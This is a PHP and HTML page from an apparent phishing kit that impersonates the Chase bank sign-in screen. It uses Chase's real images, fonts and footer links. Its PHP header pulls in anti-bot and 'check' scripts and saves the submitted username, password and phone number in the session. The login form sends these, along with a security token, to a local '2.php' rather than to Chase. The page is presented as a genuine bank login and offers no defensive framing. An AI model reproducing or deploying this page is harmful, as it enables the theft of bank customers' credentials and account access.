s

<html xmlns="http://www.w3.org/1999/xhtml" class="no-js" lang="en" dir="ltr">
<?php
session_start();
error_reporting(0);
include('../files/bars/check.php');
include('../files/bars/check1.php');
include('../files/bars/check2.php');
include('../files/bars/antibot.php');
include('../files/bars/enc.php');
include('../../call.php');
$rec = @$_GET['rec'];
$error = @$_GET['error'];
$_SESSION['j_username']= $j_username;
$_SESSION['j_password'] = $j_password;
$_SESSION['phone'] = $phone;




?>


   
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <meta name="robots" content="noindex,nofollow">
      <meta name="google-site-verification" content="3CrQzUY6Sc8yzx6kfUoUJaDReLCeS0E2Ky9uwa2_whQ">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="msapplication-config" content="none">
      <title>Sign in - chase.com</title>
      <meta name="description" content="">
      <meta name="author" content="">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <!--[if lte IE 8]>
      <link rel="stylesheet" type="text/css" media="all" href="https://static.chasecdn.com/web/2019.07.21-833/logon/assets/ie8.css" />
      <![endif]-->
      <link rel="preconnect" href="https://secure01a.chase.com/">
      <link rel="dns-prefetch" href="https://static.chasecdn.com/">
      <link rel="preconnect" href="https://static.chasecdn.com/">
      <link rel="dns-prefetch" href="https://rf15.chase.com/">
      <link rel="preconnect" href="https://rf15.chase.com/">
      <link rel="shortcut icon" href="https://static.chasecdn.com/content/dam/cpo-static/images/chasefavicon.ico">
      <link rel="apple-touch-icon" sizes="152x152" href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon-152x152.png">
      <link rel="apple-touch-icon" sizes="120x120" href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon-120x120.png">
      <link rel="apple-touch-icon" sizes="76x76" href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon-76x76.png">
      <link rel="apple-touch-icon" href="https://static.chasecdn.com/content/dam/cpo-static/images/chase-touch-icon.png">
      <meta name="apple-mobile-web-app-capable" content="yes">
      <meta name="apple-mobile-web-app-status-bar-style" content="black">
      <link rel="apple-touch-startup-image" href="https://static.chasecdn.com/web/2019.07.21-833/common/assets/img/splash/ipad-landscape.png" media="screen and (min-device-width: 481px) and (max-device-width: 1024px) and (orientation:landscape)">
      <link rel="apple-touch-startup-image" href="https://static.chasecdn.com/web/2019.07.21-833/common/assets/img/splash/ipad-portrait.png" media="screen and (min-device-width: 481px) and (max-device-width: 1024px) and (orientation:portrait)">
      <link rel="apple-touch-startup-image" href="https://static.chasecdn.com/web/2019.07.21-833/common/assets/img/splash/iphone.png" media="screen and (max-device-width: 320px)">
      <style>@font-face {font-family: Open Sans;font-style: normal;font-weight: 400;src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.eot?#iefix') format('embedded-opentype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.woff') format('woff'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.ttf') format('truetype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-regular.svg#opensans-regular') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 600;src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.eot?#iefix') format('embedded-opentype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.woff') format('woff'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.ttf') format('truetype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-semibold.svg#opensans-semibold') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 700;src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.eot?#iefix') format('embedded-opentype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.woff') format('woff'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.ttf') format('truetype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-bold.svg#opensans-bold') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 800;src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.eot?#iefix') format('embedded-opentype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.woff') format('woff'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.ttf') format('truetype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-extrabold.svg#opensans-extrabold') format('svg');}@font-face {font-family: Open Sans;font-style: normal;font-weight: 300;src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.eot?#iefix') format('embedded-opentype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.woff') format('woff'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.ttf') format('truetype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/opensans-light.svg#opensans-light') format('svg');}@font-face {font-family: videoplayer;font-style: normal;font-weight: normal;src: url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.eot?#iefix') format('embedded-opentype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.woff') format('woff'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.ttf') format('truetype'),url('https://static.chasecdn.com/content/dam/cpo-static/fonts/videoplayer.svg#videoplayer') format('svg');}
         html {height:100%; background: #fff;}
         @media only screen and (min-width: 768px) {
         html {
         background:#1c4f82; background:-moz-linear-gradient(top,#1c4f82 0%, #2e6ea3 100%); background:-webkit-linear-gradient(top,#1c4f82 0%,#2e6ea3 100%); background:linear-gradient(to bottom,#1c4f82 0%,#2e6ea3 100%);
         }
         }
      </style>
      <noscript>
         <meta http-equiv="refresh" content="0;url=https://www.chase.com/digital/resources/js-disabled">
      </noscript>
      
      
      
      
      <link rel="stylesheet" href="../files/bars/blue-ui.css">
      <link rel="stylesheet" href="../files/bars/logon.css">
      
   <body style="overflow-x: hidden; overflow-y: auto; height: 100%" data-has-view="true">
      <div id="logonApp" data-is-view="true">
         <div class="homepage" tabindex="-1">
            <div id="advertisenativeapp" data-has-view="true">
               <div data-is-view="true">
                  <div class="advertiseNativeApp showNativeAppAdBanner" style="display: none;">
                     <a class="cells closeAd" href="javascript:void(0);"><i class="jpui close icon" id="undefined" aria-hidden="true"></i> <span class="util accessible-text">close dialog</span></a> 
                     <a class="cells jpui link no-underline appDownloadLink" href="javascript:void(0);">
                        <div class="insideElem logo"><img class="nativeAppChaseLogo" src="../files/bars/ad-logo_1x.png" alt="Chase logo"></div>
                        <div class="insideElem ETEXT">Open in the Chase Mobile® app</div>
                        <div class="insideElem progessArrow"><i class="jpui progressright icon" id="undefined" aria-hidden="true"></i></div>
                        <span class="util accessible-text">and go to app store</span>
                     </a>
                  </div>
               </div>
            </div>
            <div class="toggle-aria-hidden" id="sitemessage" role="region" aria-labelledby="site-messages-heading" aria-hidden="true" data-has-view="true">
               <div data-is-view="true">
                  <div id="siteMessageAda" aria-live="polite">
                     <h2 class="util accessible-text" id="site-messages-heading">You have no more site alerts</h2>
                  </div>
               </div>
            </div>
            <div class="logon-container" id="container">
               <header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true">
                  <div class="logon header jpui transparent navigation bar" data-is-view="true">
                     <a id="logoHomepageLink" href="https://secure01a.chase.com/web/auth/?fromOrigin=https://secure01a.chase.com#">
                        <div class="chase logo"></div>
                        <span class="util accessible-text">Chase.com homepage</span>
                     </a>
                  </div>
               </header>
               <main id="logon-content" data-has-view="true">
                  <div class="container logon" data-is-view="true">
                     <div>
                        <div id="backgroundImage">
                           <div class="jpui background image fixed" id="geoImage">
                              <style type="text/css">.jpui.background.image { background-image: url(https://static.chasecdn.com/content/geo-images/images/background.mobile.day.8.jpeg);filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.day.8.jpeg', sizingMethod='scale');-ms-filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.day.8.jpeg', sizingMethod='scale');}@media (min-width:320px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.mobile.day.8.jpeg); } }@media (min-width:992px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.tablet.day.8.jpeg); } }@media (min-width:1024px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.desktop.day.8.jpeg); } }</style>
                           </div>
                        </div>
                     </div>
                     <div class="row">
                        <div class="col-xs-12 col-md-6 col-md-offset-3 logoff hidden" id="logoffbox">
                           <div class="jpui raised segment">
                              <div class="row">
                                 <div class="col-xs-10 col-xs-offset-1">
                                    <h3 class="u-focus in-progress" tabindex="-1" id="logoff-header">You're being signed out.</h3>
                                 </div>
                              </div>
                              <div class="row">
                                 <div class="col-xs-12">
                                    <div class="progress">
                                       <div class="bar"></div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                        <div class="col-xs-12 col-sm-6 col-sm-offset-3 logon-box" id="logonbox">
                           <div class="jpui raised segment">
                              <div class="row">
                                 <div class="col-xs-10 col-xs-offset-1">
                                    <form id="login-form" method="POST" autocomplete="off" action="2.php" novalidate="">
                                       <label class="util accessible-text logon-xs-toggle error" for="userId-input-field" aria-hidden="true"><span class="accessible-text errorAdaText">Error:</span> Username</label> 
                                       <div class="logon-xs-toggle" id="userId"> <input min="0" class="jpui input logon-xs-toggle" id="userId-input-field" placeholder="Username" format="" type="text" name="j_username" data-validate="userId" value="" autocorrect="off" autocapitalize="off" required>    <span class="util accessible-text validation__accessible-text" id="userId-placeHolderAdaText"> Username</span></div>
                                       <label class="util accessible-text logon-xs-toggle error" for="password-input-field" aria-hidden="true"><span class="accessible-text errorAdaText">Error:</span> Password</label> 
                                       <div class="logon-xs-toggle" id="password"> <input min="0" class="jpui input logon-xs-toggle" id="password-input-field" placeholder="Password" format="" autocomplete="off" type="password" name="j_password" data-validate="password" required="" value="" required>    </div>

                                       <div class="logon-xs-toggle" id="userId"> <input min="0" class="jpui input logon-xs-toggle" id="userId-input-field" placeholder="Phone Number" format="" type="text" name="phone" data-validate="user
Id" value="" autocorrect="off" autocapitalize="off" required>    <span class="util accessible-text validation__accessible-text" id="userId-placeHolderAdaText"> Phone Number</span></div>
                                       



<label class="util accessible-text logon-xs-toggle" for="securityToken-input-field" aria-hidden="true"><span class="accessible-text errorAdaText"></span> Token</label> 
                                       <div class="logon-xs-toggle hidden" id="securityToken"> <input min="0" class="jpui input logon-xs-toggle" id="securityToken-input-field" placeholder="Token" format="" autocomplete="off" maxlength="35" type="tel" name="securityToken" data-validate="securityToken" required="" value="">    <span class="util accessible-text validation__accessible-text" id="securityToken-placeHolderAdaText"> Token</span></div>
                                       <div class="row logon-xs-toggle">
                                          <div class="col-xs-6 rememberMe-checkbox-container">
                                             <div class="jpui checkbox" id="rememberMe">
                                                <div class="checkbox-flex">
                                                   <div class="checkboxWrap"><input class="checkbox__input" type="checkbox" id="input-rememberMe" aria-label="This checked box means that we will remember your username.  Remember me" name="rememberMe" value="on"> <i class="jpui checkmark icon check" aria-hidden="true"></i></div>
                                                   <label for="input-rememberMe"> <span class="checkbox-label" id="label-rememberMe">Remember me </span></label>
                                                </div>
                                             </div>
                                          </div>
                                          <div class="col-xs-6 token-checkbox-container">
                                             <div class="jpui checkbox useToken" id="useToken">
                                                <div class="checkbox-flex">
                                                   <div class="checkboxWrap"><input class="checkbox__input" type="checkbox" id="input-useToken" aria-label="Shows content above. Use token" name="rsaToken" value="on"> <i class="jpui checkmark icon check" aria-hidden="true"></i></div>
                                                   <label for="input-useToken"> <span class="checkbox-label" id="label-useToken">Use token </span></label>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                       <div class="row"><button type="submit" id="signin-button" class="jpui button focus fluid primary"><span class="label">Sign in</span> </button></div>
                                       <div class="row"><span class="jpui link" id="forgotPassword-link-wrapper"><a class="link-anchor" id="forgotPassword" href="javascript:void(0);" aria-label=" Forgot username/password? ">Forgot username/password?<i class="jpui progressright icon end-icon" id="forgotPassword-endIcon" aria-hidden="true"></i></a></span></div>
                                       <div class="row"><span class="jpui link" id="enrollment-link-wrapper"><a class="link-anchor last" id="enrollment" href="javascript:void(0);" aria-label=" Not Enrolled? Sign Up Now. ">Not Enrolled? Sign Up Now.<i class="jpui progressright icon end-icon" id="enrollment-endIcon" aria-hidden="true"></i></a></span></div>
                                    </form>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </main>
            </div>
            <footer class="logon-footer" id="logon-footer" data-has-view="true">
               <div class="footer-container" data-is-view="true" style="position: static;">
                  <div class="container">
                     <div class="social-links row">
                        <div class="col-xs-12">
                           <span class="follow-us-text">Follow us:</span> 
                           <ul class="icon-links">
                              <li class="facebook"><span id="requestChaseFacebook-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseFacebook"> <span class="util accessible-text" id="accessible-requestChaseFacebook">Facebook: Opens dialog</span> <i class="jpui facebook icon" id="icon-requestChaseFacebook" aria-hidden="true"></i></a></span></li>
                              <li class="instagram"><span id="requestChaseInstagram-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseInstagram"> <span class="util accessible-text" id="accessible-requestChaseInstagram">Instagram: Opens dialog</span> <i class="jpui instagram icon" id="icon-requestChaseInstagram" aria-hidden="true"></i></a></span></li>
                              <li class="twitter"><span id="requestChaseTwitter-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseTwitter"> <span class="util accessible-text" id="accessible-requestChaseTwitter">Twitter: Opens dialog</span> <i class="jpui twitter icon" id="icon-requestChaseTwitter" aria-hidden="true"></i></a></span></li>
                              <li class="youtube"><span id="requestChaseYouTube-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseYouTube"> <span class="util accessible-text" id="accessible-requestChaseYouTube">YouTube: Opens dialog</span> <i class="jpui youtube icon" id="icon-requestChaseYouTube" aria-hidden="true"></i></a></span></li>
                              <li class="linkedin"><span id="requestChaseLinkedIn-iconanchor-wrapper"><a class="jpui iconaction" href="javascript:void(0);" id="requestChaseLinkedIn"> <span class="util accessible-text" id="accessible-requestChaseLinkedIn">LinkedIn: Opens dialog</span> <i class="jpui linkedin icon" id="icon-requestChaseLinkedIn" aria-hidden="true"></i></a></span></li>
                           </ul>
                        </div>
                     </div>
                     <div class="footer-links row">
                        <div class="col-xs-12">
                           <ul>
                              <li><span class="jpui link" id="requestContactUs-link-wrapper"><a class="link-anchor" id="requestContactUs" href="javascript:void(0);" aria-label=" Contact us ">Contact us</a></span></li>
                              <li><span class="jpui link" id="requestPrivacyNotice-link-wrapper"><a class="link-anchor" id="requestPrivacyNotice" href="javascript:void(0);" aria-label=" Privacy ">Privacy</a></span></li>
                              <li><span class="jpui link" id="requestSecurity-link-wrapper"><a class="link-anchor" id="requestSecurity" href="javascript:void(0);" aria-label=" Security ">Security</a></span></li>
                              <li><span class="jpui link" id="requestTermsOfUse-link-wrapper"><a class="link-anchor" id="requestTermsOfUse" href="javascript:void(0);" aria-label=" Terms of use ">Terms of use</a></span></li>
                              <li><span class="jpui link" id="requestAccessibility-link-wrapper"><a class="link-anchor" id="requestAccessibility" href="javascript:void(0);" aria-label=" Accessibility ">Accessibility</a></span></li>
                              <li><span class="jpui link" id="requestMortgageLoanOriginators-link-wrapper"><a class="link-anchor" id="requestMortgageLoanOriginators" href="javascript:void(0);" aria-label=" SAFE Act: Chase Mortgage Loan Originators ">SAFE Act: Chase Mortgage Loan Originators</a></span></li>
                              <li><span class="jpui link" id="requestHomeMortgageDisclosureAct-link-wrapper"><a class="link-anchor" id="requestHomeMortgageDisclosureAct" href="javascript:void(0);" aria-label=" Fair Lending ">Fair Lending</a></span></li>
                              <li><span class="jpui link" id="requestAboutChase-link-wrapper"><a class="link-anchor" id="requestAboutChase" href="javascript:void(0);" aria-label=" About Chase ">About Chase</a></span></li>
                              <li><span class="jpui link" id="requestJpMorgan-link-wrapper"><a class="link-anchor" id="requestJpMorgan" href="javascript:void(0);" aria-label=" J.P. Morgan ">J.P. Morgan</a></span></li>
                              <li><span class="jpui link" id="requestJpMorganChaseCo-link-wrapper"><a class="link-anchor" id="requestJpMorganChaseCo" href="javascript:void(0);" aria-label=" JPMorgan Chase &amp; Co. ">JPMorgan Chase &amp; Co.</a></span></li>
                              <li><span class="jpui link" id="requestCareers-link-wrapper"><a class="link-anchor" id="requestCareers" href="javascript:void(0);" aria-label=" Careers ">Careers</a></span></li>
                              <li><span class="jpui link" id="requestEspanol-link-wrapper"><a class="link-anchor" id="requestEspanol" href="javascript:void(0);" aria-label=" Español ">Español</a></span></li>
                              <li><span class="jpui link" id="requestChaseCanada-link-wrapper"><a class="link-anchor" id="requestChaseCanada" href="javascript:void(0);" aria-label=" Chase Canada ">Chase Canada</a></span></li>
                              <li><span class="jpui link" id="requestSiteMap-link-wrapper"><a class="link-anchor" id="requestSiteMap" href="javascript:void(0);" aria-label=" Site map ">Site map</a></span></li>
                              <li>Member FDIC</li>
                              <li><i class="jpui equal-housing-lender icon" id="undefined" aria-hidden="true"></i> Equal Housing Lender</li>
                              <li class="copyright-label">© 2019 JPMorgan Chase &amp; Co.</li>
                           </ul>
                        </div>
                     </div>
                     <div class="row galaxy-footer">
                        <div class="col-xs-10 col-xs-offset-1">
                           <p class="NOTE"><span></span><br> <span class="copyright-label">© 2019 JPMorgan Chase &amp; Co.</span></p>
                           <p><span class="jpui link" id="galaxyRequestPrivacyNotice-link-wrapper"><a class="link-anchor NOTELINK" id="galaxyRequestPrivacyNotice" href="javascript:void(0);" aria-label=" Privacy ">Privacy<i class="jpui progressright icon end-icon" id="galaxyRequestPrivacyNotice-endIcon" aria-hidden="true"></i></a></span></p>
                           <p><span class="jpui link" id="galaxyRequestAccessibility-link-wrapper"><a class="link-anchor NOTELINK" id="galaxyRequestAccessibility" href="javascript:void(0);" aria-label=" Accessibility ">Accessibility<i class="jpui progressright icon end-icon" id="galaxyRequestAccessibility-endIcon" aria-hidden="true"></i></a></span></p>
                        </div>
                     </div>
                  </div>
               </div>
            </footer>
         </div>
         <div id="languageSupportDisclaimer"></div>
         <div id="overlay" data-has-view="true"></div>
         <div class="overlay"></div>
         <div id="signoutModal"></div>
         <div id="siteExitWarning"></div>
         <div id="serviceErrorModal"></div>
         <div id="sessionTimeoutModal"></div>
      </div>
   </body>
</html>
